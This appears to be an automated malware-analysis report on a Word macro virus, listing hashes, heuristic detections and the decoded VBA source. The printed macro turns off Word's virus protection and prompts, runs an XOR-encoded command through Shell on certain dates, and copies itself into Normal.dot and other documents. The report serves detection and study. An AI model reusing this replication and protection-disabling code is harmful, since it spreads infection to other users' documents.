Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 92c441f7c42f4c30…

MALICIOUS

Office (OLE)

30.0 KB Created: 1998-07-24 08:44:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: eeb02966111b92eb60e7e59b18f372cd SHA-1: a17c00f17a2a15ba8bca58060893a80333ec90a7 SHA-256: 92c441f7c42f4c30c1adc03db8be766e72c38c3f4efc5abe9748165113b531ce
300 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro with an AutoClose subroutine. This subroutine uses the Shell function to execute a payload, as indicated by multiple critical heuristic firings. The macro also contains obfuscated strings and attempts to disable virus protection, suggesting a downloader or dropper functionality.

Heuristics 6

  • ClamAV: Doc.Trojan.Encr-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Encr-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7460 bytes
SHA-256: b7bd720580e4fa8942332fefc4f4dd5d65695d61c20972137e52c0f139e4dad4
Detection
ClamAV: Doc.Trojan.Encr-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Xute"
Const ID_VIR = "Alm|"
Const DIR_VIR = "Z#EALM\7]XM"
Const FX_VIR = "]\UMK\\96@9E373"
Const GREETS = "Rlmk|a9{`9Alm|"

Private Function encr(s, k As Integer)
    Dim r
    r = ""
    For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next
    encr = r
End Function

Sub AutoClose()
    Dim IsInDoc, IsInTem As Boolean
    Dim InDoc, InTem As Integer
    Dim iDay, iMon As Integer
    Dim DatFx As String
    On Error GoTo Done
    IsInTem = False
    IsInDoc = False
    InDoc = 0
    InTem = 0
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
    DatFx = Date$
    iDay = Val(Mid$(DatFx, 4, 2)): iMon = Val(Mid$(DatFx, 1, 2))
    If (iMon = 7 And iDay = 26) Or (iDay + iMon) = 30 Then
        DatFx = encr(FX_VIR, 25)
        Shell DatFx, 0
        MsgBox "wow" & encr(GREETS, 25)
    End If
    
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = encr(ID_VIR, 25) Then
            IsInDoc = True
            InDoc = i
        End If
    Next
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name = encr(ID_VIR, 25) Then
            IsInTem = True
            InTem = i
        End If
    Next
    If Not IsInTem Then
        ActiveDocument.VBProject.VBComponents(InDoc).Export encr(DIR_VIR, 25)
        NormalTemplate.VBProject.VBComponents.Import encr(DIR_VIR, 25)
        NormalTemplate.Save
    End If
    If Not IsInDoc And ActiveDocument.Saved = False Then
        NormalTemplate.VBProject.VBComponents(InTem).Export encr(DIR_VIR, 25)
        ActiveDocument.VBProject.VBComponents.Import encr(DIR_VIR, 25)
        ActiveDocument.Save
    End If
    Kill encr(DIR_VIR, 25)
Done:
    Application.ScreenUpdating = True
    Application.DisplayAlerts = wdAlertsAll
End Sub

' Processing file: /opt/analyzer/scan_staging/76ff83551cfa41aeaf23966ae51b13fe.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Xute - 3916 bytes
' Line #0:
' 	Dim (Const) 
' 	LitStr 0x0004 "Alm|"
' 	VarDefn ID_VIR
' Line #1:
' 	Dim (Const) 
' 	LitStr 0x000B "Z#EALM\7]XM"
' 	VarDefn DIR_VIR
' Line #2:
' 	Dim (Const) 
' 	LitStr 0x000F "]\UMK\\96@9E373"
' 	VarDefn FX_VIR
' Line #3:
' 	Dim (Const) 
' 	LitStr 0x000E "Rlmk|a9{`9Alm|"
' 	VarDefn GREETS
' Line #4:
' Line #5:
' 	FuncDefn (Private Function encr(s, k As Integer))
' Line #6:
' 	Dim 
' 	VarDefn r
' Line #7:
' 	LitStr 0x0000 ""
' 	St r 
' Line #8:
' 	StartForVariable 
' 	Ld False 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld s 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld r 
' 	Ld s 
' 	Ld False 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Paren 
' 	Ld k 
' 	Xor 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	St r 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' Line #9:
' 	Ld r 
' 	St encr 
' Line #10:
' 	EndFunc 
' Line #11:
' Line #12:
' 	FuncDefn (Sub AutoClose())
' Line #13:
' 	Dim 
' 	VarDefn IsInDoc
' 	VarDefn IsInTem (As Boolean)
' Line #14:
' 	Dim 
' 	VarDefn InDoc
' 	VarDefn InTem (As Integer)
' Line #15:
' 	Dim 
' 	VarDefn iDay
' 	VarDefn iMon (As Integer)
' Line #16:
' 	Dim 
' 	VarDefn DatFx (As String)
' Line #17:
' 	OnError Done 
' Line #18:
' 	LitVarSpecial (False)
' 	St IsInTem 
' Line #19:
' 	LitVarSpecial (False)
' 	St IsInDoc 
' Line #20:
' 	LitDI2 0x0000 
' 	St InDoc 
' Line #21:
' 	LitDI2 0x0000 
' 	St InTem 
' Line #22:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #23:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #24:
' 	LitVa
... (truncated)